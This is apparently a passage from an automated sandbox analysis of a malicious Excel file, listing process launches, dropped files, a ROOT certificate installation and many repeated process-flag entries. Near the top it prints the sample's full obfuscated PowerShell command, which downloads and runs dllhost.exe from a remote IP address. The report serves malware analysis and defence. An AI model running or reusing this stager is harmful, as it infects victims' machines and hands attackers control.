ICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline"
            Source: ngxpd0hb.dll.8.drStatic PE information: real checksum: 0x0 should be: 0x1769
            Source: tnesdt30.dll.18.drStatic PE information: real checksum: 0x0 should be: 0xa26d
            Source: dllhost.exe.7.drStatic PE information: real checksum: 0xa2135 should be: 0xff670
            Source: dllhost[1].exe.7.drStatic PE information: real checksum: 0xa2135 should be: 0xff670
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899A022D push eax; iretd 7_2_000007FE899A0241
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899A00BD pushad ; iretd 7_2_000007FE899A00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899A2243 pushad ; ret 7_2_000007FE899A2261

            Persistence and Installation Behavior

            barindex
            Installs new ROOT certificates
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\dllhost.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.dllJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
